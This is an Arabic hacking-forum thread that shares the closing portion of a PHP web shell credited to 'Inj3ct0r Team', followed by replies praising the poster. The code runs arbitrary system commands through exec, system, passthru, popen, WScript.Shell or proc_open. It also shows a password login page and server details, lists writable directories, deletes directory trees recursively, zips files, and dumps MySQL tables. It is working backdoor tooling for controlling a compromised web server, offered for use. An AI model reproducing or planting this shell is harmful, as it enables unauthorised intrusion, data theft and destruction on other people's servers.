    formhead(array('title'=>'C0mmand *****'));
        
    makehide('action','*****');
        if (
    IS_WIN && IS_COM) {
            
    $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
            
    makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
        }
        
    p('<p>');
        
    makeinput(array('title'=>'C0mmand','name'=>'command','value'=>$command));
        
    makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'eX3cuT3'));
        
    p('</p>');
        
    formfoot();

        if (
    $command) {
            
    p('<hr width="100%" noshade /><pre>');
            if (
    $execfunc=='wscript' && IS_WIN && IS_COM) {
                
    $wsh = new COM('WScript.*****');
                
    $exec $wsh->exec('cmd.exe /c '.$command);
                
    $stdout $exec->StdOut();
                
    $stroutput $stdout->ReadAll();
                echo 
    $stroutput;
            } elseif (
    $execfunc=='proc_open' && IS_WIN && IS_COM) {
                
    $descriptorspec = array(
                   
    => array('pipe''r'),
                   
    => array('pipe''w'),
                   
    => array('pipe''w')
                );
                
    $process proc_open($_SERVER['COMSPEC'], $descriptorspec$pipes);
                if (
    is_resource($process)) {
                    
    fwrite($pipes[0], $command."\r\n");
                    
    fwrite($pipes[0], "exit\r\n");
                    
    fclose($pipes[0]);
                    while (!
    feof($pipes[1])) {
                        echo 
    fgets($pipes[1], 1024);
                    }
                    
    fclose($pipes[1]);
                    while (!
    feof($pipes[2])) {
                        echo 
    fgets($pipes[2], 1024);
                    }
                    
    fclose($pipes[2]);
                    
    proc_close($process);
                }
            } else {
                echo(
    execute($command));
            }
            
    p('</pre>');
        }
    }
    //end *****

    elseif ($action == 'phpenv') {
        
    $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
        
    $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
        !
    $dis_func && $dis_func 'No';
        
    $info = array(
            
    => array('S3rV3r Tim3',date('Y/m/d h:i:s',$timestamp)),
            
    => array('S3rV3r D0maiN',$_SERVER['SERVER_NAME']),
            
    => array('S3rV3r IP',gethostbyname($_SERVER['SERVER_NAME'])),
            
    => array('S3rV3r 0S',PHP_OS),
            
    => array('Server 0S CharS3t',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
            
    => array('S3rV3r S0ftWar3',$_SERVER['SERVER_SOFTWARE']),
            
    => array('S3rV3r W3b P0rt',$_SERVER['SERVER_PORT']),
            
    => array('pHp m0d3',strtoupper(php_sapi_name())),
            
    => array('PatH',__FILE__),

        );

        if(
    $phpvarname) {
            
    m($phpvarname .' : '.getcfg($phpvarname));
        }

        
    formhead(array('title'=>'S3rV3r Inf0rmati0N'));
        
    makehide('action','phpenv');
        
    makeinput(array('title'=>'PHP configuration Here','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
        
    formfooter();

        
    $hp = array(0=> 'S3rV3r'1=> 'PHP');
        for(
    $a=0;$a<2;$a++) {
            
    p('<h2>'.$hp[$a].' &raquo;</h2>');
            
    p('<ul class="info">');
            if (
    $a==0) {
                for(
    $i=1;$i<=9;$i++) {
                    
    p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
                }
            } elseif (
    $a == 1) {
                for(
    $i=10;$i<=23;$i++) {
                    
    p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
                }
            }
            
    p('</ul>');
        }
    }
    //end phpenv

    else {
        
    m('Undefined Action');
    }

    ?>
    </td></tr></table>
    <div style="padding:10px;border-bottom:1px solid #000000;border-top:1px solid #000000;background:#000000;">
        <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
        <B></B> - C0d3d By <a href=http://1337day.com rel="nofollow" target=_blank><B>Inj3ct0r Team  </B></a> - <B>-1337day Inj3ct0r Exploit Database : vulnerability : 0day : *****code by Inj3ct0r Team</B> All Rights Reserved.
    </div>
    </body>
    </html>

    <?php

    /*======================================================
    Show info *****
    ======================================================*/

    function m($msg) {
        echo 
    '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
        echo 
    $msg;
        echo 
    '</div>';
    }
    function 
    scookie($key$value$life 0$prefix 1) {
        global 
    $admin$timestamp$_SERVER;
        
    $key = ($prefix $admin['cookiepre'] : '').$key;
        
    $life $life $life $admin['cookielife'];
        
    $useport $_SERVER['SERVER_PORT'] == 443 0;
        
    setcookie($key$value$timestamp+$life$admin['cookiepath'], $admin['cookiedomain'], $useport);
    }
    function 
    multi($num$perpage$curpage$tablename) {
        
    $multipage '';
        if(
    $num $perpage) {
            
    $page 10;
            
    $offset 5;
            
    $pages = @ceil($num $perpage);
            if(
    $page $pages) {
                
    $from 1;
                
    $to $pages;
            } else {
                
    $from $curpage $offset;
                
    $to $curpage $page $offset 1;
                if(
    $from 1) {
                    
    $to $curpage $from;
                    
    $from 1;
                    if((
    $to $from) < $page && ($to $from) < $pages) {
                        
    $to $page;
                    }
                } elseif(
    $to $pages) {
                    
    $from $curpage $pages $to;
                    
    $to $pages;
                    if((
    $to $from) < $page && ($to $from) < $pages) {
                        
    $from $pages $page 1;
                    }
                }
            }
            
    $multipage = ($curpage $offset && $pages $page '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' '').($curpage '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage 1).');">Prev</a> ' '');
            for(
    $i $from$i <= $to$i++) {
                
    $multipage .= $i == $curpage $i.' ' '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
            }
            
    $multipage .= ($curpage $pages '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage 1).');">Next</a>' '').($to $pages ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' '');
            
    $multipage $multipage '<p>Pages: '.$multipage.'</p>' '';
        }
        return 
    $multipage;
    }
    // Login page
    function loginpage() {
    ?>
    <html>
    <head>

    <body bgcolor=black background=1.jpg>

            <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Sh3ll Inj3ct0r Team</title>
    <style type="text/css">
    A:link {text-decoration: none; color: green }
    A:visited {text-decoration: none;color:red}
    A:active {text-decoration: none}
    A:hover {text-decoration: underline; color: green;}
    input, textarea, button
    {
        font-size: 11pt;
        color:     #FFFFFF;
        font-family: verdana, sans-serif;
        background-color: #000000;
        border-left: 2px dashed #508a57;
        border-top: 2px dashed #508a57;
        border-right: 2px dashed #508a57;
        border-bottom: 2px dashed #508a57;
    }

    </style>

           <BR><BR>
    <div align=center >

    <div>
    <font color=gray>
    <br /><br /><br /><br /><br />

    <form method="POST" action="">
        <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
        <input type="hidden" name="doing" value="login">
        <input type="submit" value="L0giN">
        </form>
    <BR>
    <?php
    echo "".$err_mess."";
    ?>

        <B><font color=red>






    </div>


        </fieldset>



    </head>
    </html>


    <?php
        
    exit;

    }
    //end loginpage()

    function execute($cfe) {
        
    $res '';
        if (
    $cfe) {
            if(
    function_exists('exec')) {
                @
    exec($cfe,$res);
                
    $res join("\n",$res);
            } elseif(
    function_exists('*****_exec')) {
                
    $res = @*****_exec($cfe);
            } elseif(
    function_exists('system')) {
                @
    ob_start();
                @
    system($cfe);
                
    $res = @ob_get_contents();
                @
    ob_end_clean();
            } elseif(
    function_exists('passthru')) {
                @
    ob_start();
                @
    passthru($cfe);
                
    $res = @ob_get_contents();
                @
    ob_end_clean();
            } elseif(@
    is_resource($f = @popen($cfe,"r"))) {
                
    $res '';
                while(!@
    feof($f)) {
                    
    $res .= @fread($f,1024);
                }
                @
    pclose($f);
            }
        }
        return 
    $res;
    }
    function 
    which($pr) {
        
    $path execute("which $pr");
        return (
    $path $path $pr);
    }

    function 
    cf($fname,$text){
        if(
    $fp=@fopen($fname,'w')) {
            @
    fputs($fp,@base64_decode($text));
            @
    fclose($fp);
        }
    }

    // Debug
    function debuginfo() {
        global 
    $starttime;
        
    $mtime explode(' 'microtime());
        
    $totaltime number_format(($mtime[1] + $mtime[0] - $starttime), 6);

    }

    // Function connect database
    function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
        if(!
    $link = @mysql_connect($dbhost.':'.$dbport$dbuser$dbpass)) {
            
    p('<h2>Can not connect to MySQL server</h2>');
            exit;
        }
        if(
    $link && $dbname) {
            if (!@
    mysql_select_db($dbname$link)) {
                
    p('<h2>Database selected has error</h2>');
                exit;
            }
        }
        if(
    $link && mysql_get_server_info() > '4.1') {
            if(
    in_array(strtolower($charset), array('gbk''big5''utf8'))) {
                
    q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;"$link);
            }
        }
        return 
    $link;
    }

    // Array strip
    function s_array(&$array) {
        if (
    is_array($array)) {
            foreach (
    $array as $k => $v) {
                
    $array[$k] = s_array($v);
            }
        } else if (
    is_string($array)) {
            
    $array stripslashes($array);
        }
        return 
    $array;
    }

    // HTML Strip
    function html_clean($content) {
        
    $content htmlspecialchars($content);
        
    $content str_replace("\n""<br />"$content);
        
    $content str_replace("  ""&nbsp;&nbsp;"$content);
        
    $content str_replace("\t""&nbsp;&nbsp;&nbsp;&nbsp;"$content);
        return 
    $content;
    }

    // Chmod
    function getChmod($filepath){
        return 
    substr(base_convert(@fileperms($filepath),10,8),-4);
    }

    function 
    getPerms($filepath) {
        
    $mode = @fileperms($filepath);
        if ((
    $mode 0xC000) === 0xC000) {$type 's';}
        elseif ((
    $mode 0x4000) === 0x4000) {$type 'd';}
        elseif ((
    $mode 0xA000) === 0xA000) {$type 'l';}
        elseif ((
    $mode 0x8000) === 0x8000) {$type '-';}
        elseif ((
    $mode 0x6000) === 0x6000) {$type 'b';}
        elseif ((
    $mode 0x2000) === 0x2000) {$type 'c';}
        elseif ((
    $mode 0x1000) === 0x1000) {$type 'p';}
        else {
    $type '?';}

        
    $owner['read'] = ($mode 00400) ? 'r' '-';
        
    $owner['write'] = ($mode 00200) ? 'w' '-';
        
    $owner['execute'] = ($mode 00100) ? 'x' '-';
        
    $group['read'] = ($mode 00040) ? 'r' '-';
        
    $group['write'] = ($mode 00020) ? 'w' '-';
        
    $group['execute'] = ($mode 00010) ? 'x' '-';
        
    $world['read'] = ($mode 00004) ? 'r' '-';
        
    $world['write'] = ($mode 00002) ? 'w' '-';
        
    $world['execute'] = ($mode 00001) ? 'x' '-';

        if( 
    $mode 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' 'S';}
        if( 
    $mode 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' 'S';}
        if( 
    $mode 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' 'T';}

        return 
    $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
    }

    function 
    getUser($filepath)    {
        if (
    function_exists('posix_getpwuid')) {
            
    $array = @posix_getpwuid(@fileowner($filepath));
            if (
    $array && is_array($array)) {
                return 
    ' / <a href="#" title="User: '.$array['name'].'
    Passwd: '
    .$array['passwd'].'
    Uid: '
    .$array['uid'].'
    gid: '
    .$array['gid'].'
    Gecos: '
    .$array['gecos'].'
    Dir: '
    .$array['dir'].'
    *****: '
    .$array['*****'].'">'.$array['name'].'</a>';
            }
        }
        return 
    '';
    }

    // Delete dir
    function deltree($deldir) {
        
    $mydir=@dir($deldir);
        while(
    $file=$mydir->read())    {
            if((
    is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
                @
    chmod($deldir.'/'.$file,0777);
                
    deltree($deldir.'/'.$file);
            }
            if (
    is_file($deldir.'/'.$file)) {
                @
    chmod($deldir.'/'.$file,0777);
                @
    unlink($deldir.'/'.$file);
            }
        }
        
    $mydir->close();
        @
    chmod($deldir,0777);
        return @
    rmdir($deldir) ? 0;
    }

    // Background
    function bg() {
        global 
    $bgc;
        return (
    $bgc++%2==0) ? 'alt1' 'alt2';
    }

    // Get path
    function getPath($scriptpath$nowpath) {
        if (
    $nowpath == '.') {
            
    $nowpath $scriptpath;
        }
        
    $nowpath str_replace('\\''/'$nowpath);
        
    $nowpath str_replace('//''/'$nowpath);
        if (
    substr($nowpath, -1) != '/') {
            
    $nowpath $nowpath.'/';
        }
        return 
    $nowpath;
    }

    // Get up path
    function getUpPath($nowpath) {
        
    $pathdb explode('/'$nowpath);
        
    $num count($pathdb);
        if (
    $num 2) {
            unset(
    $pathdb[$num-1],$pathdb[$num-2]);
        }
        
    $uppath implode('/'$pathdb).'/';
        
    $uppath str_replace('//''/'$uppath);
        return 
    $uppath;
    }

    // Config
    function getcfg($varname) {
        
    $result get_cfg_var($varname);
        if (
    $result == 0) {
            return 
    'No';
        } elseif (
    $result == 1) {
            return 
    'Yes';
        } else {
            return 
    $result;
        }
    }

    // Function name
    function getfun($funName) {
        return (
    false !== function_exists($funName)) ? 'Yes' 'No';
    }

    function 
    GetList($dir){
        global 
    $dirdata,$j,$nowpath;
        !
    $j && $j=1;
        if (
    $dh opendir($dir)) {
            while (
    $file readdir($dh)) {
                
    $f=str_replace('//','/',$dir.'/'.$file);
                if(
    $file!='.' && $file!='..' && is_dir($f)){
                    if (
    is_writable($f)) {
                        
    $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
                        
    $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
                        
    $dirdata[$j]['dirchmod']=getChmod($f);
                        
    $dirdata[$j]['dirperm']=getPerms($f);
                        
    $dirdata[$j]['dirlink']=ue($dir);
                        
    $dirdata[$j]['server_link']=$f;
                        
    $dirdata[$j]['client_link']=ue($f);
                        
    $j++;
                    }
                    
    GetList($f);
                }
            }
            
    closedir($dh);
            
    clearstatcache();
            return 
    $dirdata;
        } else {
            return array();
        }
    }

    function 
    qy($sql) {
        
    //echo $sql.'<br>';
        
    $res $error '';
        if(!
    $res = @mysql_query($sql)) {
            return 
    0;
        } else if(
    is_resource($res)) {
            return 
    1;
        } else {
            return 
    2;
        }
        return 
    0;
    }

    function 
    q($sql) {
        return @
    mysql_query($sql);
    }

    function 
    fr($qy){
        
    mysql_free_result($qy);
    }

    function 
    sizecount($size) {
        if(
    $size 1073741824) {
            
    $size round($size 1073741824 100) / 100 ' G';
        } elseif(
    $size 1048576) {
            
    $size round($size 1048576 100) / 100 ' M';
        } elseif(
    $size 1024) {
            
    $size round($size 1024 100) / 100 ' K';
        } else {
            
    $size $size ' B';
        }
        return 
    $size;
    }

    // Zip
    class PHPZip{
        var 
    $out='';
        function 
    PHPZip($dir)    {
            if (@
    function_exists('gzcompress'))    {
                
    $curdir getcwd();
                if (
    is_array($dir)) $filelist $dir;
                else{
                    
    $filelist=$this -> GetFileList($dir);//File list
                    
    foreach($filelist as $k=>$v$filelist[]=substr($v,strlen($dir)+1);
                }
                if ((!empty(
    $dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
                else 
    chdir($curdir);
                if (
    count($filelist)>0){
                    foreach(
    $filelist as $filename){
                        if (
    is_file($filename)){
                            
    $fd fopen ($filename'r');
                            
    $content = @fread ($fdfilesize($filename));
                            
    fclose ($fd);
                            if (
    is_array($dir)) $filename basename($filename);
                            
    $this -> addFile($content$filename);
                        }
                    }
                    
    $this->out $this -> file();
                    
    chdir($curdir);
                }
                return 
    1;
            }
            else return 
    0;
        }

        
    // Show file list
        
    function GetFileList($dir){
            static 
    $a;
            if (
    is_dir($dir)) {
                if (
    $dh opendir($dir)) {
                    while (
    $file readdir($dh)) {
                        if(
    $file!='.' && $file!='..'){
                            
    $f=$dir .'/'$file;
                            if(
    is_dir($f)) $this->GetFileList($f);
                            
    $a[]=$f;
                        }
                    }
                    
    closedir($dh);
                }
            }
            return 
    $a;
        }

        var 
    $datasec      = array();
        var 
    $ctrl_dir     = array();
        var 
    $eof_ctrl_dir "\x50\x4b\x05\x06\x00\x00\x00\x00";
        var 
    $old_offset   0;

        function 
    unix2DosTime($unixtime 0) {
            
    $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
            if (
    $timearray['year'] < 1980) {
                
    $timearray['year']    = 1980;
                
    $timearray['mon']     = 1;
                
    $timearray['mday']    = 1;
                
    $timearray['hours']   = 0;
                
    $timearray['minutes'] = 0;
                
    $timearray['seconds'] = 0;
            } 
    // end if
            
    return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
                    (
    $timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
        }

        function 
    addFile($data$name$time 0) {
            
    $name str_replace('\\''/'$name);

            
    $dtime dechex($this->unix2DosTime($time));
            
    $hexdtime    '\x' $dtime[6] . $dtime[7]
                        . 
    '\x' $dtime[4] . $dtime[5]
                        . 
    '\x' $dtime[2] . $dtime[3]
                        . 
    '\x' $dtime[0] . $dtime[1];
            eval(
    '$hexdtime = "' $hexdtime '";');
            
    $fr    "\x50\x4b\x03\x04";
            
    $fr    .= "\x14\x00";
            
    $fr    .= "\x00\x00";
            
    $fr    .= "\x08\x00";
            
    $fr    .= $hexdtime;

            
    $unc_len strlen($data);
            
    $crc crc32($data);
            
    $zdata gzcompress($data);
            
    $c_len strlen($zdata);
            
    $zdata substr(substr($zdata0strlen($zdata) - 4), 2);
            
    $fr .= pack('V'$crc);
            
    $fr .= pack('V'$c_len);
            
    $fr .= pack('V'$unc_len);
            
    $fr .= pack('v'strlen($name));
            
    $fr .= pack('v'0);
            
    $fr .= $name;
            
    $fr .= $zdata;
            
    $fr .= pack('V'$crc);
            
    $fr .= pack('V'$c_len);
            
    $fr .= pack('V'$unc_len);

            
    $this -> datasec[] = $fr;
            
    $new_offset strlen(implode(''$this->datasec));

            
    $cdrec "\x50\x4b\x01\x02";
            
    $cdrec .= "\x00\x00";
            
    $cdrec .= "\x14\x00";
            
    $cdrec .= "\x00\x00";
            
    $cdrec .= "\x08\x00";
            
    $cdrec .= $hexdtime;
            
    $cdrec .= pack('V'$crc);
            
    $cdrec .= pack('V'$c_len);
            
    $cdrec .= pack('V'$unc_len);
            
    $cdrec .= pack('v'strlen($name) );
            
    $cdrec .= pack('v');
            
    $cdrec .= pack('v');
            
    $cdrec .= pack('v');
            
    $cdrec .= pack('v');
            
    $cdrec .= pack('V'32 );
            
    $cdrec .= pack('V'$this -> old_offset );
            
    $this -> old_offset $new_offset;
            
    $cdrec .= $name;

            
    $this -> ctrl_dir[] = $cdrec;
        }

        function 
    file() {
            
    $data    implode(''$this -> datasec);
            
    $ctrldir implode(''$this -> ctrl_dir);
            return 
    $data $ctrldir $this -> eof_ctrl_dir pack('v'sizeof($this -> ctrl_dir)) . pack('v'sizeof($this -> ctrl_dir)) .    pack('V'strlen($ctrldir)) . pack('V'strlen($data)) . "\x00\x00";
        }
    }

    // Dump mysql
    function sqldumptable($table$fp=0) {
        
    $tabledump "DROP TABLE IF EXISTS $table;\n";
        
    $tabledump .= "CREATE TABLE $table (\n";

        
    $firstfield=1;

        
    $fields q("SHOW FIELDS FROM $table");
        while (
    $field mysql_fetch_array($fields)) {
            if (!
    $firstfield) {
                
    $tabledump .= ",\n";
            } else {
                
    $firstfield=0;
            }
            
    $tabledump .= "   $field[Field] $field[Type]";
            if (!empty(
    $field["Default"])) {
                
    $tabledump .= " DEFAULT '$field[Default]'";
            }
            if (
    $field['Null'] != "YES") {
                
    $tabledump .= " NOT NULL";
            }
            if (
    $field['Extra'] != "") {
                
    $tabledump .= $field[Extra]";
            }
        }
        
    fr($fields);

        
    $keys q("SHOW KEYS FROM $table");
        while (
    $key mysql_fetch_array($keys)) {
            
    $kname=$key['Key_name'];
            if (
    $kname != "PRIMARY" && $key['Non_unique'] == 0) {
                
    $kname="UNIQUE|$kname";
            }
            if(!
    is_array($index[$kname])) {
                
    $index[$kname] = array();
            }
            
    $index[$kname][] = $key['Column_name'];
        }
        
    fr($keys);

        while(list(
    $kname$columns) = @each($index)) {
            
    $tabledump .= ",\n";
            
    $colnames=implode($columns,",");

            if (
    $kname == "PRIMARY") {
                
    $tabledump .= "   PRIMARY KEY ($colnames)";
            } else {
                if (
    substr($kname,0,6) == "UNIQUE") {
                    
    $kname=substr($kname,7);
                }
                
    $tabledump .= "   KEY $kname ($colnames)";
            }
        }

        
    $tabledump .= "\n);\n\n";
        if (
    $fp) {
            
    fwrite($fp,$tabledump);
        } else {
            echo 
    $tabledump;
        }

        
    $rows q("SELECT * FROM $table");
        
    $numfields mysql_num_fields($rows);
        while (
    $row mysql_fetch_array($rows)) {
            
    $tabledump "INSERT INTO $table VALUES(";

            
    $fieldcounter=-1;
            
    $firstfield=1;
            while (++
    $fieldcounter<$numfields) {
                if (!
    $firstfield) {
                    
    $tabledump.=", ";
                } else {
                    
    $firstfield=0;
                }

                if (!isset(
    $row[$fieldcounter])) {
                    
    $tabledump .= "NULL";
                } else {
                    
    $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
                }
            }

            
    $tabledump .= ");\n";

            if (
    $fp) {
                
    fwrite($fp,$tabledump);
            } else {
                echo 
    $tabledump;
            }
        }
        
    fr($rows);
        if (
    $fp) {
            
    fwrite($fp,"\n");
        } else {
            echo 
    "\n";
        }
    }

    function 
    ue($str){
        return 
    urlencode($str);
    }

    function 
    p($str){
        echo 
    $str."\n";
    }

    function 
    tbhead() {
        
    p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
    }
    function 
    tbfoot(){
        
    p('</table>');
    }

    function 
    makehide($name,$value=''){
        
    p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
    }

    function 
    makeinput($arg = array()){
        
    $arg['size'] = $arg['size'] > "size=\"$arg[size]\"" "size=\"100\"";
        
    $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
        !
    $arg['type'] && $arg['type'] = 'text';
        
    $arg['title'] = $arg['title'] ? $arg['title'].'<br />' '';
        
    $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
        if (
    $arg['newline']) {
            
    p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type=mwadah]\" $arg[size] $arg[extra] /></p>");
        } else {
            
    p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type=mwadah]\" $arg[size] $arg[extra] />");
        }
    }

    function 
    makeselect($arg = array()){
        if (
    $arg['onchange']) {
            
    $onchange 'onchange="'.$arg['onchange'].'"';
        }
        
    $arg['title'] = $arg['title'] ? $arg['title'] : '';
        if (
    $arg['newline']) p('<p>');
        
    p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
            if (
    is_array($arg['option'])) {
                foreach (
    $arg['option'] as $key=>$value) {
                    if (
    $arg['selected']==$key) {
                        
    p("<option value=\"$key\" selected>$value</option>");
                    } else {
                        
    p("<option value=\"$key\">$value</option>");
                    }
                }
            }
        
    p("</select>");
        if (
    $arg['newline']) p('</p>');
    }
    function 
    formhead($arg = array()) {
        !
    $arg['method'] && $arg['method'] = 'post';
        !
    $arg['action'] && $arg['action'] = $self;
        
    $arg['target'] = $arg['target'] ? "rel="nofollow" target=\"$arg[target]\"" '';
        !
    $arg['name'] && $arg['name'] = 'form1';
        
    p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
        if (
    $arg['title']) {
            
    p('<h2>'.$arg['title'].' &raquo;</h2>');
        }
    }

    function 
    maketext($arg = array()){
        !
    $arg['cols'] && $arg['cols'] = 100;
        !
    $arg['rows'] && $arg['rows'] = 25;
        
    $arg['title'] = $arg['title'] ? $arg['title'].'<br />' '';
        
    p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
    }

    function 
    formfooter($name ''){
        !
    $name && $name 'submit';
        
    p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
        
    p('</form>');
    }

    function 
    formfoot(){
        
    p('</form>');
    }

    // Exit
    function pr($a) {
        echo 
    '<pre>';
        
    print_r($a);
        echo 
    '</pre>';

    }
    ?>

    </body>

    </html>
     
  3. كرآش الجنوب

    كرآش الجنوب Developer

    الأنتساب:
    ‏17 مايو 2012
    المشاركات:
    2
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    HackeR
    الإقامة:
    Saudi Arabi
    رد: sh3ll inj3ct0r team

    شغل عدل وادوااتك دايمن نااادره

    الف شكر !:"​
     
  4. mr.3need

    mr.3need Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    42
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    Pharm
    الإقامة:
    PrIv8
    رد: sh3ll inj3ct0r team

    وعليكم السلام ورحمة الله وبركاته

    ماشاء الله عليك ياشرس دايم ممتعنا بطرحك
     
  5. Dr.LoranS

    Dr.LoranS Developer

    الأنتساب:
    ‏18 مايو 2012
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    hacker
    الإقامة:
    saudia
    رد: sh3ll inj3ct0r team

    مبدع ي بطل .$

    لأهنت .

    bye1~`
     
  6. kenzo

    kenzo Developer

    الأنتساب:
    ‏22 مايو 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    مصمم
    الإقامة:
    الرياض
    رد: sh3ll inj3ct0r team

    الله يعطيك الف عافيه

    الله لا يهينك


    )5:")5:")5:"
     
  7. ياسين عمرو

    ياسين عمرو Developer

    الأنتساب:
    ‏25 مايو 2012
    المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    Mascara
    رد: sh3ll inj3ct0r team


    اللهٍ يعطيكٍ الفٍ عـآفيهٍ
     
  8. عـبـد الله

    عـبـد الله Developer

    الأنتساب:
    ‏4 سبتمبر 2011
    المشاركات:
    33
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: sh3ll inj3ct0r team


    مبدع عزيزى الله يسلم ايديك يا غالى


    ويعطيك العافية يا بطل &:":
     
  9. Mr-DoYl

    Mr-DoYl Developer

    الأنتساب:
    ‏29 مايو 2012
    المشاركات:
    34
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: sh3ll inj3ct0r team


    بارك الله فيك


    تقبل خالص مودتي واحترامي&:":
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة